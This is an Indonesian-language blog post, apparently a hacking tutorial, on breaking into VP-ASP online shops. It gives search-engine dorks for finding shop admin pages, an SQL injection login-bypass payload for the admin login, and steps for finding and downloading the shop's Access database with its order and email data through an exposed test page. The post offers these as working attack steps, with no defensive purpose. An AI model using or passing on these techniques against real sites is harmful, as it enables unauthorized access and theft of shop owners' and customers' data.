----< SQL injection
--------------------
1. Buka search engine Favorit anda. Gunakan keyword berikut:
allinurl:shopadmin.asp
atau gunakan:
allinurl:vp-asp
2. Misalnya target adalah www.spyrozone.net, maka kemungkinan URLnya adalah:
www.spyrozone.net/vp-asp dir/shopadmin.asp
atau
www.spyrozone.net/shopadmin.asp
3. Lakukan SQL Injection..
www.spyrozone.net/vp-asp dir/shopadmin.asp
login : 'or''=' atau login : admin passwd : 'or''=' passwd : 'or''='
4. Jika berhasil, anda akan melihat apa yang anda cari didalamnya ;)
----< Download database
-----------------------
etode kedua :
-------------- 1. ketika injection falied maka kita coba download database nya :P~
2. contoh URL target:
www.spyrozone.net/vp-asp dir/shopdbtest.asp
atau
www.spyrozone.net/shopdbtest.asp
3. Jika anda beruntung maka anda akan mendapatkan informasi sensitif:
- xDatabase
- xDblocation
- xdatabasetype
- xEmail
- xEmailName
- xEmailSubject
- xEmailSystem
- xEmailType
- xOrdernumber
4. Lihat dimana lokasi file *.mdb berada:
- xDatabase ---> untuk mengetahui nama file *.mdb nya.
- xDblocation ---> untuk mengetahui lokasi file *.mdb nya.
Contohnya :
- xDatabase = shopping200
- xDblocation = shop
Maka apa yang anda cari berada pada:
www.spyrozone.net/shop/shoping200.mdb
Download ajah, lalu buka dengan MS Access. ;)
No comments:
Post a Comment